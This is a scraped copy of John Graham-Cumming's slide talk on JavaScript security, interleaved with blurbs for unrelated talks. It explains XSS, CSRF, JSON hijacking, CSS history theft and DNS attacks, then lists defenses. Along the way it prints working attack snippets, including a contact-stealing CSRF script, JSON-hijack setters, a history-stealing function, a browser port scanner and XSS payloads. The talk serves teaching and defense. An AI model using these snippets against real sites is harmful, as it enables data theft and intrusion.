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JavaScript SecurityJohn Graham-Cumming
Living in a powder keg and giving off sparksJavaScript security is a messThe security model is outdatedKey examplesAttacking DNS to attack JavaScriptWhat are we going to do?
The JavaScript SandboxJavaScript security dates to 1995Two key concerns:Stop a malicious web site from attacking your computerStop a malicious web site from interacting with another web site
The Death of the PCIf all your documents are in the cloud, what good is protecting your PC?The JavaScript sandbox does nothing to prevent cloud attacksWho cares if a web site is prevented from reading your “My Documents”: it’s empty

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Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript

Modern web applications depend on a lot of auxiliary scripts which are often hosted on third-party CDNs. Should an attacker be able to tamper with the files hosted on such a CDN, millions of sites could be compromised. Web developers need a way to guarantee the integrity of scripts hosted elsewhere. This is the motivation behind a new addition to the web platform being introduced by the W3C: sub-resource integrity. Both Firefox and Chrome have initial implementations of this new specification and a few early adopters are currently evaluating this feature.

hstssriweb appliation security
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra

A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't. Here's the last slide:

Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)

* Django is a Web Application Framework, written in Python * Allows rapid, secure and agile web development. * Write better web applications in less time & effort.

djangotechnical presentation
The Same Origin PolicyScripts running on one page can’t interact with other pagesFor example, scripts loaded by can’t access virusbtn.comBut the Same Origin Policy doesn’t apply to the scripts themselves
<SCRIPT>Inline<SCRIPT>   … do stuff …</SCRIPT>Remote<SCRIPT SRC=“”></SCRIPT>
Multiple <SCRIPT> elementsScripts get equal access to each other and the page they are loaded from<SCRIPT SRC=“http://google-analytics/ga.js”></SCRIPT><SCRIPT SRC=“”></SCRIPT>
JavaScript Global ObjectJavaScript is inherently a ‘global’ languageVariables have global scopeFunctions have global scopeObjects inherit from a global object

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Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices

The presentation is based on the book 「Two scoops of Django : Best Practices for Django 1.5」by Daniel Greenfeld and Audrey Roy.

django security
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox

Lightning talk by avlidienburnn on how to break AngularJS sandbox and more or less XSS every AngularJS app out there (slight e

Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end

My presentation from Framsia. Topics: XSS (reflected, stored, dom-based) CSRF Clickjacking Header based approaches (CSP, X-frame-options) EcmaScript5 HTML5 Some slides borrowed from John Wilander

Bad stuff you can do globallyDifferent scripts can mess with each other’s variablesDifferent scripts can redefine each other’s functionsScripts can override native methodsTransmit data anywhereWatch keystrokesSteal cookiesAll scripts run with equal authority
JavaScript is everywhere<SCRIPT> tagsInside HTML elements<a id=up_810112 onclick="return vote(this)" href="vote? for=810112&dir=up&by=jgrahamc&auth=3q4&whence=%6e%65%77%73">Inside CSSbackground-color: expression( (new Date()).getHours()%2 ? "#B8D4FF" : "#F08A00" );background-image: url("javascript: = '#00cc00';");
No mechanism for protecting JavaScriptSigned JavaScript mechanism available in Netscape Communicator 4.xRemember that?
JavaScript SummaryThe security model is for the wrong threatThe language itself has no security awarenessOh, and it’s the most important language for all web sites

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Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)

How a new HTTP response header can help increase the depth of your web application defenses. Also includes a few slides on HTTP Strict Transport Security, a header which helps protects HTTPS sites from sslstrip attacks.

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(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe

JavaScript is the most widely used language cross platforms. This talk will analyze the security concerns from past to present with a peek to the future of this important language. This talk was presented as Keynote at CyberCamp Espana 2014.

Flash умер. Да здравствует Flash!
Flash умер. Да здравствует Flash!Flash умер. Да здравствует Flash!
Flash умер. Да здравствует Flash!

This document summarizes three security vulnerabilities that can exist in Flash applications: 1. Same-origin policy bypass through loader contexts and cross-domain policies 2. Phishing through manipulation of SWF URLs in metadata 3. Cross-site scripting through user-supplied parameters if the SWF is loaded from a public CDN domain that is shared by other sites.

phdaysphdays 6
Key attacksCross-site scriptingCross-site Request ForgeryJSON HijackingJavaScript + CSSSandbox HolesDNS Attacks
Cross-site Scripting (XSS)End user injects script via web form or URL which is then executed by other usersPersistent: stored in databaseReflected: usually in a URLInjected scripts have the same access as all other scripts
XSS Example: Twitter
XSS Example: MySpaceJS/SpaceHero or Samy WormAutomatic friend requests<div style="background:url('javascript:alert(1)')">

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Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat

XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.

MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective

Various techniques of TLS Redirection / Virtual Host Confusion attacks

Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors

XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also

XSS Example: PHPnukeReflected attackRequires social engineering<script>alert(document.cookie);</script>
Script EscalationScripts can load other scriptsGet a foothold and you can do anything<script id="external_script" type="text/JavaScript"></script><script>    document.getElementById('external_script').src = ’’</script>
Cross-Site Request ForgeryHijack cookies to use a session for bad purposes<imgsrc="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">Enhance with JavaScript for complex transactions.
CSRF Example: Google MailSteal authenticated user’s contact ({  Success: true,  Errors: [],  Body: {…

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Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionPreventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code Execution

DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which leads to a huge potential vulnerability, the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure DOMinatorPro.

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How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
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How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...

1. The document provides tips for effective hacking and bug hunting in 2015, focusing on web applications. 2. It discusses philosophy shifts towards crowdsourced testing, and techniques for discovery such as finding less tested application parts and acquisitions. 3. The document also covers mapping methodology, parameters to attack, and bypassing filters for XSS, SQLi, file inclusion, and CSRF vulnerabilities.

bug hunterbug bountybugcrowd
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror Stories

Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.

CSRF Example: Google MailFull exploit<script type="text/javascript">function google(data){    var emails, i;    for (i = 0; i <data.Body.Contacts.length; i++) {        mails += "<li>" +data.Body.Contacts[i].Email + "";    }    document.write("<ol>" + emails + "</ol>");}</script><script type="text/javascript" src=""></script>
JSON HijackingCSRF attack against JSON objectsWorks by redefined the Object constructor in JavaScript<script>function Object() { setter = captureObject;}function captureObject(x) {…
JSON Hijacking Example: Twitter	Could steal the friends’ timeline for a user<script>Object.prototype.__defineSetter__('user',function(obj){for(vari in obj) {alert(i + '=' + obj[i]);} });</script><script defer="defer" src=></script>
Stealing history with JavaScript and CSSUse JavaScript to look at the ‘visited’ color of linksfunction stealHistory() {for (vari = 0; i < websites.length; i++) {varlink = document.createElement("a"); = "id" + i;link.href = websites[i];link.innerHTML = websites[i];document.body.appendChild(link);varcolor = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");                document.body.removeChild(link);if (color == "rgb(0, 0, 255)") {document.write('' + websites[i] + '');}}}

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XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?

This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.

New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation

This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved. Please visit:

application securitycyber securitycross-site scripting
Wetware Bugs and Refactoring
Wetware Bugs and RefactoringWetware Bugs and Refactoring
Wetware Bugs and Refactoring

Die wichtigste Komponente bei der Entwicklung von Software besteht zu 70 Prozent aus Wasser: den beteiligten Personen. Während wir bei den Komponenten Hard- und speziell Software sehr genau über die Fehler, Probleme und Defekte Bescheid wissen, stehen wir bei der Wetware noch am Anfang – dabei haben wir im Alltag die ganze Zeit mit seltsamen Argumenten, Fehlschlüssen, kognitiven Verzerrungen und seltsamen Effekten in Teams zu tun. Der Talk stellt die häufigsten Streiche vor, die unser Gehirn uns spielt und wie man damit umgehen kann.

team buildingagileagile software development
Sandbox HolesSandbox not immune to actual security holesMost recent was Google V8 JavaScript engineGoogle Chrome V8 JavaScript Engine Remote Code Execution VulnerabilityBugtraq: 36149
No Turing Test in JavaScriptNo way to distinguish between actual click by user and JavaScript clickCan’t tell whether a user initiated an action or not
Attacking your home firewallXSS attack on BT Home Hub to use UPnP to open a porthttp://''%3e%3c/script%3e%3ca%20b=
Port scanning in JavaScriptPort scan using imagesvarAttackAPI = { version: '0.1', author: 'PetkoPetkov (architect)', homepage: ''};AttackAPI.PortScanner = {};AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) { var timeout = (timeout == null)?100:timeout; varimg = new Image();  img.onerror = function () {  if (!img) return;  img = undefined;  callback(target, port, 'open'); };  img.onload = img.onerror; img.src = 'http://' + target + ':' + port;  setTimeout(function () {  if (!img) return;  img = undefined;  callback(target, port, 'closed'); }, timeout);};AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout){ for (index = 0; index < ports.length; index++)  AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);};

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Agile versus Management WJAX 2014
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Die modernisierte Fassung der "Management Brainfucks": Warum wehren sich Manager gegen agile Methoden, obwohl diese zu ihrem Vorteil wären? Warum behindern sie uns Entwickler bei der Arbeit mit Formalien, Blaming, naiven Lösungsvorschlägen und Kontrollillusion? Der Talk zeigt die Wurzeln dieses Missverständnisses und wie man sich darausbewegt.

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Keiner glaubt mehr an die Versprechen aus der IT, weder Druck, Motivation noch ein grösseres Team bringen auch nur etwas Performance. Es gibt viele Fehler in der Software und die Fluktuation geht nach oben. Wie fängt man so ein Projekt ein? Eine Geschichte von den offensichtlichen und nicht so offensichtlichen Dingen, die man dabei berücksichtigen muss - aus dem echten Leben erzählt.

DevOps beyond the Tools
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DevOps beyond the Tools

DevOps is mainstream - at least the tools, the automation and the metrics. But what happened to DevOps Culture? Does it still matter? If yes - how do we achieve it?

DNS AttacksAttacks on DNS are real (Kaminsky et al.)If you can alter the DNS of one remote JavaScript you can take over the pageFor example, is on 47% of the top 1,000 web sites.69% of the top 1,000 load a web analytics solution remotely97% load something remotely
Attacking TechCrunch
TechCrunch and JavaScript18 remotely loaded,,,,,,,,, google-analytics.comAdditional embedded <SCRIPT> tagsCompromise one, you compromise the entire page
Load scripts via HTTPS to security?	Tested all major browsers loading a remote scriptScripts was from a site with an expired certificate for a different domain name

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Reparier Deine Unternehmenskultur!

In der Softwareentwicklung sind wir schon lange agil, und die Operations-Leute arbeiten mit uns in DevOps-Manier zusammen. Eventuell ist das Product Development nach Lean Startup mit uns verzahnt, und mit viel Glück hat mein Chef eine Management 3.0-Schulung besucht. Trotzdem gibt es noch immer Politik im Unternehmen. Manche Kollegen übernehmen keine Verantwortung. Es gibt Teams oder Abteilungen, die nur eigene Ziele verfolgen und nicht mit anderen kooperieren. Und, ganz ehrlich, eigentlich sollten wir manche Dinge ganz anders machen, aber niemand kümmert sich so richtig darum. Aber wie repariere ich meine Firmenkultur? Wie sorge ich dafür, dass endlich alle mitarbeiten und Verantwortung übernehmen?

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Von der Governance-getriebenen Architektur der IT-Entscheider und Architecture Boards kamen wir zur emergenten, teambestimmten Architektur, und von dort über Strategien wie MicroServices zu Organisationsformen, die wir frei anhand unserer Wunscharchitektur definieren. Im Gegensatz zu den sich immer weiter beschleunigenden Architektur- und Technologietrends bewegen sich Team- und Abteilungsstrukturen mit ihrer eigenen Geschwindigkeit - und manchmal auch gar nicht. Ein Bericht aus der Praxis, vom Planen, Scheitern, Lernen und demütiger Architektur.

HTTPS won’t save you
What are we going to do?Sanitize user input (doh!)Don’t just rely on cookies for authenticationEnforce safe subset of JavaScript CAJA and AdsafeTell people to run NoScriptDeprecate JavaScript
Sanitize User Input; Escape OutputIt’s not hard!Yes, it is…Twitter recently blew it on the application name XSS holeUTF-7 encoding+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-All versions of RoR vulnerable to Unicode decoding flawHard to get right with so many languages in the mix
Don’t just use cookiesDon’t use GET for sensitive requestsUse more than cookies in POSTe.g. add a secret generated for that session to prevent simple CSRF attackse.g. RoR has protect_from_forgery :secret => "123456789012345678901234567890..."

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Wenn ITler Verträge machen steht der Schutz des eigenen Hinterteils im Vordergrund, und in Wahrheit versteht keiner die Konsequenzen des geschriebenen. Am Ende wird er ohnehin nichtig und durch einen Vergleich ersetzt, bei dem Anwälte das Bauchgefühl der Mandanten verhandeln, um nicht bei einem vollständig sachfremden Richter ein blaues Wunder zu erleben. Aber was hilft dann, wenn der Inhalt eines Projektes erst am Ende wirklich feststeht, und die meisten schwierigen Fragen sich erst im Verlauf ergeben?

Warum die it nicht um new work herumkommt
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Von flachen Hierarchien zur Networked Company, von losen Netzwerken zur Holacracy, von Managern zur Bossless Organization: IT-Unternehmen diskutieren zurzeit viele Begriffe aus dem NewWork-Umfeld. Warum springt gerade unsere Branche auf diese Konzepte an? Dreht sich alles um den Arbeitsmarkt und die Generation Y, oder reagieren wir auf steigende Komplexität und Dynamik? Welche Folgen hat das auf das Unternehmen und unsere Arbeit? Ein Bericht aus Theorie und Praxis, von Hypes, offensichtlichen und nicht offensichtlichen Fehlern.

JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security

Wenn der größte Teil der Logik in JavaScript stattfindet, dann findet auch der größere Teil der Sicherheitsrisiken dort seine Heimat. Und Angreifer finden mit JavaScript eine interessante neue Umwelt, denn die Sprache selbst und auch ihre Heimat in Browser und Node.js bringen viele neue Probleme. Und genau da setzt der Vortrag an: die verblüffenden Unterschiede von JavaScript zu anderen Sprachen, wenn es um Security geht. Die Risiken und auch die Besonderheiten von Browsern und anderen JavaScript-Engines wie Node.js. Die Securityimplikationen von JavaScript-Frameworks bishin zu speziellen Problemen wie mXSS, ReDOS und HTML5-Security.

Safe JavaScript subsetsRun all third-party code through AdsafeRestricts dangerous JavaScript methods and access to globalsOr test code with Google CAJADesign to allow widgets to interact safely on pages like iGoogle
Causata’s small contributionjsHub: web-site tagging done rightOpen SourceSecureOne Tag to Serve Them All
NoScriptMozilla Firefox plug-in that allows fine grained control of which scripts can run on which pagesAn application firewall for JavaScriptAdvanced users only!
Deprecate JavaScriptIt’s not too late. Let’s start again with a language built for security and for the webRipley: I say we take off and nuke the entire site from orbit. It's the only way to be sure.Burke: Ho-ho-hold on, hold on one second. This installation has a substantial dollar value attached to it.Ripley: They can bill me.

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Wie man mit MicroServices beliebig skaliert

Management brainfucks
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Management brainfucks

Wie erkläre ich einem klassischen Manager, warum Programmierer effizienter werden, wenn sie mit zwei Leuten an der gleichen Aufgabe sitzen? Warum ein Programmierer in 14 Stunden täglich nicht mehr schafft als in 8, warum ein Team schneller wird, wenn man das Programmiergenie entfernt. Warum man effizienter wird, wenn man Low-Prio-Tasks vor High-Prio-Tasks macht und nur 6 von 8 Stunden planen will.

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ConclusionThe combination of a move to the cloud and a 14 year old security environment scares meThis problem has to be addressedVery hard for end-users to mitigate the risks

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Javascript Security

  • 2. Living in a powder keg and giving off sparksJavaScript security is a messThe security model is outdatedKey examplesAttacking DNS to attack JavaScriptWhat are we going to do?
  • 3. The JavaScript SandboxJavaScript security dates to 1995Two key concerns:Stop a malicious web site from attacking your computerStop a malicious web site from interacting with another web site
  • 4. The Death of the PCIf all your documents are in the cloud, what good is protecting your PC?The JavaScript sandbox does nothing to prevent cloud attacksWho cares if a web site is prevented from reading your “My Documents”: it’s empty
  • 5. The Same Origin PolicyScripts running on one page can’t interact with other pagesFor example, scripts loaded by can’t access virusbtn.comBut the Same Origin Policy doesn’t apply to the scripts themselves
  • 6. <SCRIPT>Inline<SCRIPT> … do stuff …</SCRIPT>Remote<SCRIPT SRC=“”></SCRIPT>
  • 7. Multiple <SCRIPT> elementsScripts get equal access to each other and the page they are loaded from<SCRIPT SRC=“http://google-analytics/ga.js”></SCRIPT><SCRIPT SRC=“”></SCRIPT>
  • 8. JavaScript Global ObjectJavaScript is inherently a ‘global’ languageVariables have global scopeFunctions have global scopeObjects inherit from a global object
  • 9. Bad stuff you can do globallyDifferent scripts can mess with each other’s variablesDifferent scripts can redefine each other’s functionsScripts can override native methodsTransmit data anywhereWatch keystrokesSteal cookiesAll scripts run with equal authority
  • 10. JavaScript is everywhere<SCRIPT> tagsInside HTML elements<a id=up_810112 onclick="return vote(this)" href="vote? for=810112&dir=up&by=jgrahamc&auth=3q4&whence=%6e%65%77%73">Inside CSSbackground-color: expression( (new Date()).getHours()%2 ? "#B8D4FF" : "#F08A00" );background-image: url("javascript: = '#00cc00';");
  • 11. No mechanism for protecting JavaScriptSigned JavaScript mechanism available in Netscape Communicator 4.xRemember that?
  • 12. JavaScript SummaryThe security model is for the wrong threatThe language itself has no security awarenessOh, and it’s the most important language for all web sites
  • 13. Key attacksCross-site scriptingCross-site Request ForgeryJSON HijackingJavaScript + CSSSandbox HolesDNS Attacks
  • 14. Cross-site Scripting (XSS)End user injects script via web form or URL which is then executed by other usersPersistent: stored in databaseReflected: usually in a URLInjected scripts have the same access as all other scripts
  • 16. XSS Example: MySpaceJS/SpaceHero or Samy WormAutomatic friend requests<div style="background:url('javascript:alert(1)')">
  • 17. XSS Example: PHPnukeReflected attackRequires social engineering<script>alert(document.cookie);</script>
  • 18. Script EscalationScripts can load other scriptsGet a foothold and you can do anything<script id="external_script" type="text/JavaScript"></script><script> document.getElementById('external_script').src = ’’</script>
  • 19. Cross-Site Request ForgeryHijack cookies to use a session for bad purposes<imgsrc="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">Enhance with JavaScript for complex transactions.
  • 20. CSRF Example: Google MailSteal authenticated user’s contact ({  Success: true,  Errors: [],  Body: {…
  • 21. CSRF Example: Google MailFull exploit<script type="text/javascript">function google(data){    var emails, i;    for (i = 0; i <data.Body.Contacts.length; i++) {        mails += "<li>" +data.Body.Contacts[i].Email + "";    }    document.write("<ol>" + emails + "</ol>");}</script><script type="text/javascript" src=""></script>
  • 22. JSON HijackingCSRF attack against JSON objectsWorks by redefined the Object constructor in JavaScript<script>function Object() { setter = captureObject;}function captureObject(x) {…
  • 23. JSON Hijacking Example: Twitter Could steal the friends’ timeline for a user<script>Object.prototype.__defineSetter__('user',function(obj){for(vari in obj) {alert(i + '=' + obj[i]);} });</script><script defer="defer" src=></script>
  • 24. Stealing history with JavaScript and CSSUse JavaScript to look at the ‘visited’ color of linksfunction stealHistory() {for (vari = 0; i < websites.length; i++) {varlink = document.createElement("a"); = "id" + i;link.href = websites[i];link.innerHTML = websites[i];document.body.appendChild(link);varcolor = document.defaultView.getComputedStyle(link,null).getPropertyValue("color"); document.body.removeChild(link);if (color == "rgb(0, 0, 255)") {document.write('' + websites[i] + '');}}}
  • 25. Sandbox HolesSandbox not immune to actual security holesMost recent was Google V8 JavaScript engineGoogle Chrome V8 JavaScript Engine Remote Code Execution VulnerabilityBugtraq: 36149
  • 26. No Turing Test in JavaScriptNo way to distinguish between actual click by user and JavaScript clickCan’t tell whether a user initiated an action or not
  • 27. Attacking your home firewallXSS attack on BT Home Hub to use UPnP to open a porthttp://''%3e%3c/script%3e%3ca%20b=
  • 28. Port scanning in JavaScriptPort scan using imagesvarAttackAPI = { version: '0.1', author: 'PetkoPetkov (architect)', homepage: ''};AttackAPI.PortScanner = {};AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) { var timeout = (timeout == null)?100:timeout; varimg = new Image();  img.onerror = function () {  if (!img) return;  img = undefined;  callback(target, port, 'open'); };  img.onload = img.onerror; img.src = 'http://' + target + ':' + port;  setTimeout(function () {  if (!img) return;  img = undefined;  callback(target, port, 'closed'); }, timeout);};AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout){ for (index = 0; index < ports.length; index++)  AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);};
  • 29. DNS AttacksAttacks on DNS are real (Kaminsky et al.)If you can alter the DNS of one remote JavaScript you can take over the pageFor example, is on 47% of the top 1,000 web sites.69% of the top 1,000 load a web analytics solution remotely97% load something remotely
  • 31. TechCrunch and JavaScript18 remotely loaded,,,,,,,,, google-analytics.comAdditional embedded <SCRIPT> tagsCompromise one, you compromise the entire page
  • 32. Load scripts via HTTPS to security? Tested all major browsers loading a remote scriptScripts was from a site with an expired certificate for a different domain name
  • 34. What are we going to do?Sanitize user input (doh!)Don’t just rely on cookies for authenticationEnforce safe subset of JavaScript CAJA and AdsafeTell people to run NoScriptDeprecate JavaScript
  • 35. Sanitize User Input; Escape OutputIt’s not hard!Yes, it is…Twitter recently blew it on the application name XSS holeUTF-7 encoding+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-All versions of RoR vulnerable to Unicode decoding flawHard to get right with so many languages in the mix
  • 36. Don’t just use cookiesDon’t use GET for sensitive requestsUse more than cookies in POSTe.g. add a secret generated for that session to prevent simple CSRF attackse.g. RoR has protect_from_forgery :secret => "123456789012345678901234567890..."
  • 37. Safe JavaScript subsetsRun all third-party code through AdsafeRestricts dangerous JavaScript methods and access to globalsOr test code with Google CAJADesign to allow widgets to interact safely on pages like iGoogle
  • 38. Causata’s small contributionjsHub: web-site tagging done rightOpen SourceSecureOne Tag to Serve Them All
  • 39. NoScriptMozilla Firefox plug-in that allows fine grained control of which scripts can run on which pagesAn application firewall for JavaScriptAdvanced users only!
  • 40. Deprecate JavaScriptIt’s not too late. Let’s start again with a language built for security and for the webRipley: I say we take off and nuke the entire site from orbit. It's the only way to be sure.Burke: Ho-ho-hold on, hold on one second. This installation has a substantial dollar value attached to it.Ripley: They can bill me.
  • 41. ConclusionThe combination of a move to the cloud and a 14 year old security environment scares meThis problem has to be addressedVery hard for end-users to mitigate the risks